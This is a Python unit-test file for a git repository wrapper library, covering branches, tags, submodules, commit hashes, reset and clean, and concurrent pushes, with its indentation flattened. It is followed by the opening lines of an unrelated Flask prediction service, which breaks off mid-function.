r2 = r1.make_temp_cloned_repo()
r1.save_file('readme.txt', 'readme is good')
r1.push('origin', 'master')
r2.pull()
self.assertEqual( 'readme is good', r2.read_file('readme.txt') )
@git_temp_home_func()
def test_save_file_modify(self):
r1 = self._make_repo()
r2 = r1.make_temp_cloned_repo()
r1.add_file('readme.txt', 'readme is good')
# r1.save_file('readme.txt', 'readme is bad')
# r1.push('origin', 'master')
# r2.pull()
# self.assertEqual( 'readme is bad', r2.read_file('readme.txt') )
@git_temp_home_func()
def xtest_reset_to_revision(self):
r1 = self._make_repo()
r1.add_file('readme.txt', 'readme is good')
r1.push('origin', 'master')
r2 = r1.make_temp_cloned_repo()
r3 = r1.make_temp_cloned_repo()
r2.pull()
r3.pull()
r2.save_file('readme.txt', 'readme 2')
r2.push()
r3.save_file('readme.txt', 'conflicted 1')
with self.assertRaises(RuntimeError) as ctx:
r3.push()
r3.reset_to_revision('@{u}')
r3.pull()
r3.save_file('readme.txt', 'conflicted 1')
r3.push()
@git_temp_home_func()
def test_list_branches_just_master(self):
r1 = self._make_repo()
commit = r1.add_file('readme.txt', 'readme is good')
r1.push('origin', 'master')
r2 = r1.make_temp_cloned_repo()
self.assertEqual( [
( 'master', 'both', True, 0, 0, commit, 'unittest', 'add readme.txt' ),
], r2.list_branches('both') )
@git_temp_home_func()
def test_list_branches_create_inactive(self):
r1 = self._make_repo()
commit = r1.add_file('readme.txt', 'readme is good')
r1.push('origin', 'master')
r2 = r1.make_temp_cloned_repo()
r2.branch_create('b1', checkout = False)
self.assertEqual( [
( 'b1', 'local', False, 0, 0, commit, 'unittest', 'add readme.txt' ),
( 'master', 'both', True, 0, 0, commit, 'unittest', 'add readme.txt' ),
], r2.list_branches('both') )
@git_temp_home_func()
def test_list_branches_create_active(self):
r1 = self._make_repo()
commit = r1.add_file('readme.txt', 'readme is good')
r1.push('origin', 'master')
r2 = r1.make_temp_cloned_repo()
r2.branch_create('b1', checkout = True)
self.assertEqual( [
( 'b1', 'local', True, 0, 0, commit, 'unittest', 'add readme.txt' ),
( 'master', 'both', False, 0, 0, commit, 'unittest', 'add readme.txt' ),
], r2.list_branches('both') )
@git_temp_home_func()
def test_list_branches_create_push(self):
r1 = self._make_repo()
commit = r1.add_file('readme.txt', 'readme is good')
r1.push('origin', 'master')
r2 = r1.make_temp_cloned_repo()
r2.branch_create('b1', checkout = True, push = True)
self.assertEqual( [
( 'b1', 'both', True, 0, 0, commit, 'unittest', 'add readme.txt' ),
( 'master', 'both', False, 0, 0, commit, 'unittest', 'add readme.txt' ),
], r2.list_branches('both') )
@git_temp_home_func()
def test_branch_status(self):
r1 = self._make_repo()
r1.add_file('readme.txt', 'readme is good')
r1.push('origin', 'master')
r2 = r1.make_temp_cloned_repo()
r3 = r1.make_temp_cloned_repo()
self.assertEqual( ( 0, 0 ), r2.branch_status() )
r2.add_file('foo.txt', 'foo.txt')
self.assertEqual( ( 1, 0 ), r2.branch_status() )
r2.add_file('bar.txt', 'bar.txt')
self.assertEqual( ( 0, 0 ), r3.branch_status() )
r2.push()
r3.fetch()
self.assertEqual( ( 0, 2 ), r3.branch_status() )
@git_temp_home_func()
def test_add_file_with_commit(self):
r1 = self._make_repo(content = [ 'file readme.txt "readme is good" 644' ])
r2 = r1.make_temp_cloned_repo()
self.assertEqual( [ 'readme.txt' ], r2.find_all_files() )
commit1 = r1.last_commit_hash()
r1.add_file('orange.txt', 'orange is good', commit = True)
commit2 = r1.last_commit_hash()
self.assertNotEqual( commit1, commit2 )
r1.push()
r2.pull()
self.assertEqual( [ 'orange.txt', 'readme.txt' ], r2.find_all_files() )
@git_temp_home_func()
def test_add_file_with_no_commit(self):
r1 = self._make_repo(content = [ 'file readme.txt "readme is good" 644' ])
r2 = r1.make_temp_cloned_repo()
self.assertEqual( [ 'readme.txt' ], r2.find_all_files() )
commit1 = r1.last_commit_hash()
r1.add_file('orange.txt', 'orange is good', commit = False)
commit2 = r1.last_commit_hash()
self.assertEqual( commit1, commit2 )
r1.push()
r2.pull()
self.assertEqual( [ 'readme.txt' ], r2.find_all_files() )
@git_temp_home_func()
def test_files_for_commit(self):
r1 = self._make_repo(content = [ 'file readme.txt "readme is good" 644' ], prefix = 'r1-')
r1.add_file('orange.txt', 'orange is good', commit = False)
r1.add_file('kiwi.txt', 'kiwi is good', commit = False)
r1.add([ 'orange.txt', 'kiwi.txt' ])
r1.commit('add stuff', [ 'orange.txt', 'kiwi.txt' ])
r1.push()
r2 = r1.make_temp_cloned_repo(prefix = 'r2-')
self.assertEqual( [ 'kiwi.txt', 'orange.txt' ], r2.files_for_commit(r2.last_commit_hash()) )
@git_temp_home_func()
def test_active_branch(self):
r1 = self._make_repo(content = [ 'file readme.txt "readme is good" 644' ], prefix = 'r1-')
r1.branch_create('b1', checkout = False, push = True)
r2 = r1.make_temp_cloned_repo(prefix = 'r2-')
self.assertEqual( 'master', r2.active_branch() )
r2.checkout('b1')
self.assertEqual( 'b1', r2.active_branch() )
r2.checkout('master')
self.assertEqual( 'master', r2.active_branch() )
@git_temp_home_func()
def test_remove(self):
r = self._make_repo(remote = True)
r.write_temp_content([
'file a/b/c/foo.txt "foo content" 755',
'file d/e/bar.txt "bar content" 644',
'dir baz "" 700',
])
r.add('.')
r.commit('add', '.')
r.remove('d/e/bar.txt')
r.commit('remove', 'd/e/bar.txt')
r.push()
@git_temp_home_func()
def test_has_unpushed_commits(self):
r = self._make_repo(remote = True)
r.write_temp_content([
'file foo.txt "this is foo" 644',
])
r.add([ 'foo.txt' ])
r.commit('add foo.txt', [ 'foo.txt' ])
r.push('origin', 'master')
self.assertFalse( r.has_unpushed_commits() )
r.add_file('bar.txt', 'this is bar.txt', commit = True)
self.assertTrue( r.has_unpushed_commits() )
@git_temp_home_func()
def test_has_local_tag(self):
content = [
'file foo.txt "this is foo" 644',
]
r = self._make_repo(remote = True, content = content)
r.tag('foo-1.0.0', push = False)
self.assertTrue( r.has_local_tag('foo-1.0.0') )
self.assertFalse( r.has_remote_tag('foo-1.0.0') )
@git_temp_home_func()
def test_has_remote_tag(self):
content = [
'file foo.txt "this is foo" 644',
]
r = self._make_repo(remote = True, content = content)
r.tag('foo-1.0.0', push = False)
self.assertTrue( r.has_local_tag('foo-1.0.0') )
self.assertFalse( r.has_remote_tag('foo-1.0.0') )
r.push_tag('foo-1.0.0')
self.assertTrue( r.has_remote_tag('foo-1.0.0') )
@git_temp_home_func()
def test_has_commit_exists(self):
content = [
'file foo.txt "this is foo" 644',
]
r = self._make_repo(remote = True, content = content)
commit1 = r.add_file('bar.txt', 'this is bar.txt')
commit2 = r.add_file('baz.txt', 'this is baz.txt')
self.assertTrue( r.has_commit(commit1) )
self.assertTrue( r.has_commit(commit2) )
@git_temp_home_func()
def test_has_commit_does_not_exist(self):
content = [
'file foo.txt "this is foo" 644',
]
r = self._make_repo(remote = True, content = content)
commit1 = r.add_file('bar.txt', 'this is bar.txt')
commit2 = r.add_file('baz.txt', 'this is baz.txt')
self.assertFalse( r.has_commit('0000000') )
@git_temp_home_func()
def test_has_commit_invalid_hash(self):
content = [
'file foo.txt "this is foo" 644',
]
r = self._make_repo(remote = True, content = content)
commit1 = r.add_file('bar.txt', 'this is bar.txt')
commit2 = r.add_file('baz.txt', 'this is baz.txt')
self.assertFalse( r.has_commit('invalidhash') )
@git_temp_home_func()
def test_has_revision(self):
content = [
'file foo.txt "this is foo" 644',
]
r = self._make_repo(remote = True, content = content)
commit1 = r.add_file('bar.txt', 'this is bar.txt')
r.tag('foo-1.0.0', push = False)
commit2 = r.add_file('baz.txt', 'this is baz.txt')
r.tag('foo-1.0.1', push = False)
self.assertFalse( r.has_revision('0000000') )
self.assertTrue( r.has_revision(commit1) )
self.assertTrue( r.has_revision(commit2) )
self.assertTrue( r.has_revision('foo-1.0.0') )
self.assertTrue( r.has_revision('foo-1.0.1') )
self.assertFalse( r.has_revision('foo-1.0.2') )
@git_temp_home_func()
def test_submodule_set_branch(self):
sub_content = [
'file subfoo.txt "this is subfoo" 644',
]
sub_repo = self._make_repo(remote = True, content = sub_content)
content = [
'file foo.txt "this is foo" 644',
]
r = self._make_repo(remote = True, content = content)
r.call_git('submodule add {} mod'.format(sub_repo.address))
self.assertEqual( None, r.submodule_get_branch('mod') )
r.submodule_set_branch('mod', 'foo')
self.assertEqual( 'foo', r.submodule_get_branch('mod') )
@git_temp_home_func()
def test_submodule_init(self):
sub_content = [
'file subfoo.txt "this is subfoo" 644',
]
sub_repo = self._make_repo(remote = True, content = sub_content, prefix = '-mod-')
content = [
'file foo.txt "this is foo" 644',
]
r = self._make_repo(remote = True, content = content, prefix = '-main-')
self.assertEqual( [ 'foo.txt' ], r.find_all_files() )
r.submodule_add(sub_repo.address, 'mod')
r.commit('add mod submodule', '.')
r.push()
self.assertEqual( [ 'foo.txt', 'mod/subfoo.txt' ], r.find_all_files() )
r2 = git_repo(self.make_temp_dir(), address = r.address)
r2.clone()
self.assertEqual( ( 'mod', None, sub_repo.last_commit_hash(), sub_repo.last_commit_hash(short_hash = True), False, None ),
r2.submodule_status_one('mod') )
self.assertEqual( [ 'foo.txt' ], r2.find_all_files() )
r2.submodule_init(submodule = 'mod')
self.assertEqual( [ 'foo.txt', 'mod/subfoo.txt' ], r2.find_all_files() )
self.assertEqual( ( 'mod', None, sub_repo.last_commit_hash(), sub_repo.last_commit_hash(short_hash = True), True, 'heads/master' ),
r2.submodule_status_one('mod') )
@git_temp_home_func()
def test_submodule_update_revision(self):
sub_content = [
'file subfoo.txt "this is subfoo" 644',
]
sub_repo = self._make_repo(remote = True, content = sub_content, prefix = '-mod-')
rev1 = sub_repo.last_commit_hash(short_hash = True)
content = [
'file foo.txt "this is foo" 644',
]
r1 = self._make_repo(remote = True, content = content, prefix = '-main-')
self.assertEqual( [ 'foo.txt' ], r1.find_all_files() )
r1.submodule_add(sub_repo.address, 'mod')
r1.commit('add mod submodule', '.')
r1.push()
self.assertEqual( [ 'foo.txt', 'mod/subfoo.txt' ], r1.find_all_files() )
rev2 = sub_repo.add_file('sub_kiwi.txt', 'this is sub_kiwi.txt', push = True)
r2 = git_repo(self.make_temp_dir(), address = r1.address)
r2.clone()
r2.submodule_init(submodule = 'mod')
self.assertEqual( rev1, r2.submodule_status_one('mod').revision )
# check that setting the same revision returns false
rv = r2.submodule_update_revision('mod', rev1)
self.assertFalse( rv )
rv = r2.submodule_update_revision('mod', rev2)
self.assertTrue( rv )
r2.commit('update mod', 'mod')
r2.push()
rv = r2.submodule_update_revision('mod', rev2)
self.assertFalse( rv )
r3 = git_repo(self.make_temp_dir(), address = r1.address)
r3.clone()
r3.submodule_init(submodule = 'mod')
self.assertEqual( rev2, r3.submodule_status_one('mod').revision )
rev3 = sub_repo.add_file('sub_orange.txt', 'this is sub_orange.txt', push = True)
r4 = git_repo(self.make_temp_dir(), address = r1.address)
r4.clone()
r4.submodule_init(submodule = 'mod')
self.assertEqual( rev2, r4.submodule_status_one('mod').revision )
rv = r4.submodule_update_revision('mod', rev3)
self.assertTrue( rv )
r4.commit('update mod', 'mod')
r4.push()
self.assertEqual( rev3, r4.submodule_status_one('mod').revision )
rev4 = sub_repo.add_file('sub_melon.txt', 'this is sub_melon.txt', push = True)
r3.pull()
r3.submodule_init(submodule = 'mod')
self.assertEqual( rev3, r3.submodule_status_one('mod').revision )
rv = r3.submodule_update_revision('mod', rev4)
self.assertTrue( rv )
r3.commit('update mod', 'mod')
r3.push()
self.assertEqual( rev4, r3.submodule_status_one('mod').revision )
@git_temp_home_func()
def test_is_long_hash(self):
content = [
'file subfoo.txt "this is subfoo" 644',
]
r = self._make_repo(remote = True, content = content, prefix = '-mod-')
self.assertTrue( r.is_long_hash(r.last_commit_hash(short_hash = False)) )
self.assertFalse( r.is_long_hash(r.last_commit_hash(short_hash = True)) )
@git_temp_home_func()
def test_is_short_hash(self):
content = [
'file subfoo.txt "this is subfoo" 644',
]
r = self._make_repo(remote = True, content = content, prefix = '-mod-')
self.assertFalse( r.is_short_hash(r.last_commit_hash(short_hash = False)) )
self.assertTrue( r.is_short_hash(r.last_commit_hash(short_hash = True)) )
@git_temp_home_func()
def test_short_hash(self):
content = [
'file subfoo.txt "this is subfoo" 644',
]
r = self._make_repo(remote = True, content = content, prefix = '-mod-')
long_hash = r.last_commit_hash(short_hash = False)
short_hash = r.last_commit_hash(short_hash = True)
self.assertEqual( short_hash, r.short_hash(long_hash) )
self.assertEqual( short_hash, r.short_hash(short_hash) )
@git_temp_home_func()
def test_long_hash(self):
content = [
'file subfoo.txt "this is subfoo" 644',
]
r = self._make_repo(remote = True, content = content, prefix = '-mod-')
long_hash = r.last_commit_hash(short_hash = False)
short_hash = r.last_commit_hash(short_hash = True)
self.assertTrue( r.is_long_hash(long_hash) )
self.assertFalse( r.is_long_hash(short_hash) )
self.assertEqual( long_hash, r.long_hash(long_hash) )
self.assertEqual( long_hash, r.long_hash(short_hash) )
@git_temp_home_func()
def test_revision_equals(self):
content = [
'file subfoo.txt "this is subfoo" 644',
]
r = self._make_repo(remote = True, content = content, prefix = '-mod-')
rev1_short = r.last_commit_hash(short_hash = True)
    rev1_long = r.last_commit_hash(short_hash = False)
r.add_file('sub_kiwi.txt', 'this is sub_kiwi.txt', push = True)
rev2_short = r.last_commit_hash(short_hash = True)
    rev2_long = r.last_commit_hash(short_hash = False)
self.assertTrue( r.revision_equals(rev1_short, rev1_short) )
self.assertTrue( r.revision_equals(rev1_long, rev1_short) )
self.assertTrue( r.revision_equals(rev1_short, rev1_long) )
self.assertTrue( r.revision_equals(rev1_long, rev1_long) )
@git_temp_home_func()
def test_operation_with_reset_basic(self):
r1 = self._make_repo()
r1.write_temp_content([
'file foo.txt "this is foo" 644',
])
r1.add([ 'foo.txt' ])
r1.commit('add foo.txt', [ 'foo.txt' ])
r1.push('origin', 'master')
r2 = r1.make_temp_cloned_repo()
def _op(repo):
repo.write_temp_content([
'file bar.txt "this is bar" 644',
])
repo.add('.')
r2.operation_with_reset(_op, 'add bar.txt')
self.assertEqual( 'this is foo', r2.read_file('foo.txt', codec = 'utf8') )
self.assertEqual( 'this is bar', r2.read_file('bar.txt', codec = 'utf8') )
r3 = r1.make_temp_cloned_repo()
self.assertEqual( 'this is foo', r3.read_file('foo.txt', codec = 'utf8') )
self.assertEqual( 'this is bar', r3.read_file('bar.txt', codec = 'utf8') )
@git_temp_home_func()
def test_operation_with_reset_with_conflict(self):
r1 = self._make_repo()
r1.write_temp_content([
'file foo.txt "this is foo" 644',
])
r1.add([ 'foo.txt' ])
r1.commit('add foo.txt', [ 'foo.txt' ])
r1.push('origin', 'master')
r2 = r1.make_temp_cloned_repo()
r3 = r1.make_temp_cloned_repo()
def _op2(repo):
repo.write_temp_content([
'file foo.txt "this is foo 2" 644',
])
r2.operation_with_reset(_op2, 'hack foo.txt to 2')
def _op3(repo):
repo.write_temp_content([
'file foo.txt "this is foo 3" 644',
])
r3.operation_with_reset(_op3, 'hack foo.txt to 3')
self.assertEqual( 'this is foo 3', r3.read_file('foo.txt', codec = 'utf8') )
r4 = r1.make_temp_cloned_repo()
self.assertEqual( 'this is foo 3', r4.read_file('foo.txt', codec = 'utf8') )
@git_temp_home_func()
def test_operation_with_reset_with_multiprocess_conflict(self):
'''
Create a bunch of processes trying to push to the same repo.
This sometimes creates a git locking issue and tests the operation push retry code.
'''
r1 = self._make_repo()
r1.write_temp_content([
'file foo.txt "_foo" 644',
])
r1.add([ 'foo.txt' ])
r1.commit('add foo.txt', [ 'foo.txt' ])
r1.push('origin', 'master')
def worker(n):
worker_tmp_root = self.make_temp_dir(suffix = 'worker-{}'.format(n))
worker_repo = git_repo(worker_tmp_root, address = r1.address)
worker_repo.clone_or_pull()
worker_repo.checkout('master')
def _op(repo):
old_content = repo.read_file('foo.txt', codec = 'utf8')
new_content = '{}\nworker {}'.format(old_content, n)
fp = repo.file_path('foo.txt')
file_util.save(fp, content = new_content, codec = 'utf8', mode = 0o644)
worker_repo.operation_with_reset(_op, 'from worker {}'.format(n))
num_jobs = 9
jobs = []
for i in range(num_jobs):
p = multiprocessing.Process(target = worker, args = (i, ))
jobs.append(p)
p.start()
for job in jobs:
job.join()
r2 = r1.make_temp_cloned_repo()
self.assertEqual( [
'_foo',
'worker 0',
'worker 1',
'worker 2',
'worker 3',
'worker 4',
'worker 5',
'worker 6',
'worker 7',
'worker 8',
], sorted(r2.read_file('foo.txt', codec = 'utf8').split('\n')) )
@git_temp_home_func()
def test_atexit_reset(self):
r = self._make_repo()
r.write_temp_content([
'file foo.txt "_foo" 644',
])
r.add([ 'foo.txt' ])
r.commit('add foo.txt', [ 'foo.txt' ])
r.push('origin', 'master')
tmp_script_content = '''\
from bes.git.git_repo import git_repo
r = git_repo("{}", address = "{}")
r.atexit_reset(revision = 'HEAD')
r.save_file('foo.txt', content = 'i hacked you', add = False, commit = False)
'''.format(r.root, r.address)
tmp_script = self.make_temp_file(content = tmp_script_content, perm = 0o0755)
cmd = [ sys.executable, tmp_script, r.root ]
execute.execute(cmd)
self.assertFalse( r.has_changes() )
@git_temp_home_func()
def test_has_local_branch(self):
content = [
'file foo.txt "this is foo" 644',
]
r = self._make_repo(remote = True, content = content)
self.assertFalse( r.has_local_branch('kiwi') )
r.branch_create('kiwi')
self.assertTrue( r.has_local_branch('kiwi') )
@git_temp_home_func()
def test_has_remote_branch(self):
content = [
'file foo.txt "this is foo" 644',
]
r = self._make_repo(remote = True, content = content)
self.assertFalse( r.has_remote_branch('kiwi') )
r.branch_create('kiwi', push = True)
self.assertTrue( r.has_local_branch('kiwi') )
self.assertTrue( r.has_remote_branch('kiwi') )
@git_temp_home_func()
def test_reset(self):
content = [
'file foo.txt "this is foo" 644',
]
r1 = self._make_repo(remote = True, content = content)
r1.push('origin', 'master')
r2 = r1.make_temp_cloned_repo()
self.assertEqual( 'this is foo', r2.read_file('foo.txt') )
r2.save_file('foo.txt', 'i hacked you', add = False, commit = False)
self.assertEqual( 'i hacked you', r2.read_file('foo.txt') )
r2.reset()
self.assertEqual( 'this is foo', r2.read_file('foo.txt') )
@git_temp_home_func()
def test_clean(self):
content = [
'file foo.txt "this is foo" 644',
]
r = self._make_repo(remote = True, content = content)
self.assertEqual( [ 'foo.txt' ], r.find_all_files() )
r.save_file('garbage.txt', 'this is garbage', add = False, commit = False)
self.assertEqual( [ 'foo.txt', 'garbage.txt' ], r.find_all_files() )
r.clean()
self.assertEqual( [ 'foo.txt' ], r.find_all_files() )
@git_temp_home_func()
def test_submodule_reset(self):
sub_content = [
'file subfoo.txt "this is subfoo" 644',
]
sub_repo = self._make_repo(remote = True, content = sub_content, prefix = '-mod-')
rev1 = sub_repo.last_commit_hash(short_hash = True)
rev2 = sub_repo.add_file('sub_kiwi.txt', 'this is sub_kiwi.txt', push = True)
content = [
'file foo.txt "this is foo" 644',
]
r1 = self._make_repo(remote = True, content = content, prefix = '-main-')
self.assertEqual( [ 'foo.txt' ], r1.find_all_files() )
r1.submodule_add(sub_repo.address, 'mod')
r1.commit('add mod submodule', '.')
r1.push()
self.assertEqual( [ 'foo.txt', 'mod/sub_kiwi.txt', 'mod/subfoo.txt' ], r1.find_all_files() )
self.assertFalse( r1.has_changes(submodules = True) )
rv = r1.submodule_update_revision('mod', rev1)
self.assertTrue( rv )
self.assertTrue( r1.has_changes(submodules = True) )
r1.reset(submodules = True)
self.assertFalse( r1.has_changes(submodules = True) )
@git_temp_home_func()
def test_submodule_clean(self):
sub_content = [
'file subfoo.txt "this is subfoo" 644',
]
sub_repo = self._make_repo(remote = True, content = sub_content, prefix = '-mod-')
rev1 = sub_repo.last_commit_hash(short_hash = True)
rev2 = sub_repo.add_file('sub_kiwi.txt', 'this is sub_kiwi.txt', push = True)
content = [
'file foo.txt "this is foo" 644',
]
r1 = self._make_repo(remote = True, content = content, prefix = '-main-')
self.assertEqual( [ 'foo.txt' ], r1.find_all_files() )
r1.submodule_add(sub_repo.address, 'mod')
r1.commit('add mod submodule', '.')
r1.push()
self.assertEqual( [ 'foo.txt', 'mod/sub_kiwi.txt', 'mod/subfoo.txt' ], r1.find_all_files() )
self.assertFalse( r1.has_changes() )
r1.save_file('mod/untracked_junk.txt', content = 'this is untracked junk', add = False, commit = False)
self.assertTrue( r1.has_changes(untracked_files = True, submodules = True) )
r1.clean(submodules = True)
self.assertFalse( r1.has_changes(untracked_files = True, submodules = True) )
@git_temp_home_func()
def test_head_info_basic(self):
content = [
'file foo.txt "this is foo" 644',
]
r = self._make_repo(remote = True, content = content, commit_message = 'message 1')
c1 = r.last_commit_hash(short_hash = True)
self.assertEqual( ( 'branch', 'master', None, c1, 'message 1', None ), r.head_info() )
@git_temp_home_func()
def test_head_info_empty_repo(self):
    'Test that head_info() works on an empty, just-created repo.'
tmp_dir = self.make_temp_dir()
git.init(tmp_dir)
r = git_repo(tmp_dir)
self.assertEqual( ( 'nothing', None, None, None, None, None ), r.head_info() )
@git_temp_home_func()
def test_head_info_detached_head_at_commit(self):
content = [
'file foo.txt "this is foo" 644',
]
r = self._make_repo(remote = True, content = content, commit_message = 'message 1')
c1 = r.last_commit_hash(short_hash = True)
r.add_file('bar.txt', 'this is bar')
c2 = r.last_commit_hash(short_hash = True)
r.checkout(c1)
self.assertEqual( ( 'detached_commit', None, None, c1, 'message 1', [ 'master' ] ), r.head_info() )
self.assertEqual( True, r.head_info().is_detached )
self.assertEqual( False, r.head_info().is_tag )
self.assertEqual( False, r.head_info().is_branch )
self.assertEqual( 'detached_commit', r.head_info().state )
self.assertEqual( 'detached_commit::{}'.format(c1), str(r.head_info()) )
@git_temp_home_func()
def test_head_info_detached_head_at_tag(self):
content = [
'file foo.txt "this is foo" 644',
]
r = self._make_repo(remote = True, content = content, commit_message = 'message 1')
c1 = r.last_commit_hash(short_hash = True)
r.tag('1.2.3')
r.add_file('bar.txt', 'this is bar')
c2 = r.last_commit_hash(short_hash = True)
r.checkout('1.2.3')
self.assertEqual( ( 'tag', None, '1.2.3', c1, 'message 1', [ 'master' ] ), r.head_info() )
self.assertEqual( True, r.head_info().is_tag )
self.assertEqual( True, r.head_info().is_detached )
self.assertEqual( False, r.head_info().is_branch )
self.assertEqual( 'tag', r.head_info().state )
self.assertEqual( 'tag:{}:{}'.format('1.2.3', c1), str(r.head_info()) )
@git_temp_home_func()
def test_head_info_detached_head_at_branch(self):
content = [
'file foo.txt "this is foo" 644',
]
r = self._make_repo(remote = True, content = content, commit_message = 'message 1')
c1 = r.last_commit_hash(short_hash = True)
r.branch_create('b1', checkout = True)
self.assertEqual( ( 'branch', 'b1', None, c1, 'message 1', None ), r.head_info() )
self.assertEqual( False, r.head_info().is_detached )
r.add_file('bar.txt', 'this is bar in b1', commit_message = 'message 2')
c2 = r.last_commit_hash(short_hash = True)
self.assertEqual( ( 'branch', 'b1', None, c2, 'message 2', None ), r.head_info() )
self.assertEqual( False, r.head_info().is_tag )
self.assertEqual( True, r.head_info().is_branch )
self.assertEqual( 'branch', r.head_info().state )
self.assertEqual( 'branch:{}:{}'.format('b1', c2), str(r.head_info()) )
@git_temp_home_func()
def test_head_info_detached_head_at_tag_in_branch(self):
content = [
'file foo.txt "this is foo" 644',
]
r = self._make_repo(remote = True, content = content, commit_message = 'message 1')
r.branch_create('b1', checkout = True)
r.add_file('kiwi.txt', 'this is kiwi in b1', commit_message = 'message 2')
c1 = r.last_commit_hash(short_hash = True)
r.tag('1.2.3')
r.checkout('master')
r.branch_create('b2', checkout = True)
r.add_file('lemon.txt', 'this is lemon in b1', commit_message = 'message 3')
r.checkout('1.2.3')
self.assertEqual( True, r.head_info().is_tag )
self.assertEqual( False, r.head_info().is_branch )
self.assertEqual( 'tag', r.head_info().state )
self.assertEqual( 'tag:{}:{}'.format('1.2.3', c1), str(r.head_info()) )
self.assertEqual( None, r.head_info().branch )
self.assertEqual( [ 'b1' ], r.head_info().ref_branches )
@git_temp_home_func()
def test_head_info_detached_head_at_tag_in_branch_multiple_branches(self):
content = [
'file foo.txt "this is foo" 644',
]
r = self._make_repo(remote = True, content = content, commit_message = 'message 1')
r.branch_create('b1', checkout = True)
r.add_file('kiwi.txt', 'this is kiwi in b1', commit_message = 'message 2')
c1 = r.last_commit_hash(short_hash = True)
r.tag('1.2.3')
r.branch_create('b2', checkout = True)
r.add_file('lemon.txt', 'this is lemon in b1', commit_message = 'message 3')
r.checkout('1.2.3')
self.assertEqual( True, r.head_info().is_tag )
self.assertEqual( False, r.head_info().is_branch )
self.assertEqual( 'tag', r.head_info().state )
self.assertEqual( 'tag:{}:{}'.format('1.2.3', c1), str(r.head_info()) )
self.assertEqual( None, r.head_info().branch )
self.assertEqual( [ 'b1', 'b2' ], r.head_info().ref_branches )
@git_temp_home_func()
def test_head_info_detached_head_at_commit_in_branch(self):
content = [
'file foo.txt "this is foo" 644',
]
r = self._make_repo(remote = True, content = content, commit_message = 'message 1')
r.branch_create('b1', checkout = True)
r.add_file('kiwi.txt', 'this is kiwi in b1', commit_message = 'message 2')
c1 = r.last_commit_hash(short_hash = True)
r.checkout('master')
r.branch_create('b2', checkout = True)
r.add_file('lemon.txt', 'this is lemon in b1', commit_message = 'message 3')
r.checkout(c1)
self.assertEqual( False, r.head_info().is_tag )
self.assertEqual( False, r.head_info().is_branch )
self.assertEqual( True, r.head_info().is_detached_commit )
self.assertEqual( 'detached_commit', r.head_info().state )
self.assertEqual( 'detached_commit::{}'.format(c1), str(r.head_info()) )
self.assertEqual( None, r.head_info().branch )
self.assertEqual( [ 'b1' ], r.head_info().ref_branches )
@git_temp_home_func()
def test_is_tag(self):
content = [
'file foo.txt "this is foo" 644',
]
r = self._make_repo(remote = True, content = content)
commit1 = r.add_file('bar.txt', 'this is bar.txt')
r.tag('foo-1.0.0', push = False)
commit2 = r.add_file('baz.txt', 'this is baz.txt')
r.tag('foo-1.0.1', push = False)
self.assertTrue( r.is_tag('foo-1.0.0') )
self.assertTrue( r.is_tag('foo-1.0.1') )
self.assertFalse( r.is_tag('foo-1.0.2') )
self.assertFalse( r.is_tag(commit1) )
self.assertFalse( r.is_tag(commit2) )
r.branch_create('b1', checkout = True)
self.assertFalse( r.is_tag('b1') )
@git_temp_home_func()
def test_is_branch(self):
content = [
'file foo.txt "this is foo" 644',
]
r = self._make_repo(remote = True, content = content)
c1 = r.add_file('bar.txt', 'this is bar.txt')
r.tag('t1')
r.branch_create('b1', checkout = True)
c2 = r.add_file('baz.txt', 'this is baz.txt')
r.tag('t2')
r.checkout('master')
r.branch_create('b2', checkout = True)
self.assertFalse( r.is_branch('t1') )
self.assertFalse( r.is_branch('t2') )
self.assertTrue( r.is_branch('b1') )
self.assertTrue( r.is_branch('b2') )
self.assertFalse( r.is_branch('notthere') )
@git_temp_home_func()
def test_branches_for_tag_single_branch(self):
content = [
'file foo.txt "this is foo" 644',
]
r = self._make_repo(remote = True, content = content)
r.branch_create('b1', checkout = True)
c1 = r.add_file('kiwi.txt', 'this is kiwi.txt')
r.tag('t1')
r.checkout('master')
r.branch_create('b2')
c2 = r.add_file('apple.txt', 'this is apple.txt')
r.checkout('master')
r.branch_create('b3', checkout = True)
self.assertEqual( [ 'b1' ], r.branches_for_tag('t1') )
@git_temp_home_func()
def test_branches_for_tag_multiple_branches(self):
content = [
'file foo.txt "this is foo" 644',
]
r = self._make_repo(remote = True, content = content)
r.branch_create('b1', checkout = True)
c1 = r.add_file('kiwi.txt', 'this is kiwi.txt')
r.tag('t1')
r.branch_create('b2')
c2 = r.add_file('apple.txt', 'this is apple.txt')
r.checkout('master')
r.branch_create('b3')
self.assertEqual( [ 'b1', 'b2' ] , r.branches_for_tag('t1') )
@git_temp_home_func()
def test_branches_for_tag_detached_head(self):
content = [
'file foo.txt "this is foo" 644',
]
r = self._make_repo(remote = True, content = content)
r.branch_create('b1', checkout = True)
c1 = r.add_file('kiwi.txt', 'this is kiwi.txt')
r.tag('t1')
r.checkout('master')
r.branch_create('b2')
c2 = r.add_file('apple.txt', 'this is apple.txt')
r.checkout('master')
r.branch_create('b3', checkout = True)
r.checkout('t1')
self.assertEqual( [ 'b1' ], r.branches_for_tag('t1') )
@git_temp_home_func()
def test_rsync_dir(self):
src_content = [
'file foo/bar/kiwi.txt "this is kiwi" 644',
]
src_repo = self._make_repo(remote = True, content = src_content)
dst_content = [
'file apple.txt "this is apple" 644',
]
dst_repo = self._make_repo(remote = True, content = dst_content)
# r.branch_create('b1', checkout = True)
# c1 = r.add_file('kiwi.txt', 'this is kiwi.txt')
# r.tag('t1')
# r.checkout('master')
# r.branch_create('b2')
# c2 = r.add_file('apple.txt', 'this is apple.txt')
# r.checkout('master')
# r.branch_create('b3', checkout = True)
# r.checkout('t1')
# self.assertEqual( [ 'b1' ], r.branches_for_tag('t1') )
@git_temp_home_func()
def test_tag_with_commit(self):
content = [
'file foo.txt "this is foo" 644',
]
r = self._make_repo(remote = True, content = content)
c1 = r.add_file('kiwi.txt', 'this is kiwi.txt')
c2 = r.add_file('lemon.txt', 'this is lemon.txt')
r.tag('t1')
c3 = r.add_file('apple.txt', 'this is apple.txt')
r.tag('t2')
r.tag('t3', commit = c1)
    self.assertEqual( r.short_hash(c1), r.ref_info('t3').commit_short )
if __name__ == '__main__':
unit_test.main()
|
index.py
|
from flask import Flask, request, jsonify
from src.request_processing import PredictRequestProcessor, ModelRequestProcessor
from initialize import before_all
import logging
import threading
import asyncio
from src.model_manager import ModelManager
app = Flask(__name__)
PORT = 80
def initialize_all():
ModelManager.initialize()
@app.route('/predict', methods=['POST'])
def predict():
"""Registry Design Pattern"""
logging.info("POST /predict")
request_data = request.json
request_processor = PredictRequestProcessor(request_data)
output = request_processor.get_response()
logging.info(output)
return output
@app.route('/model', methods=['PUT'])
def model():
"""Model Manager"""
request_data = request.json
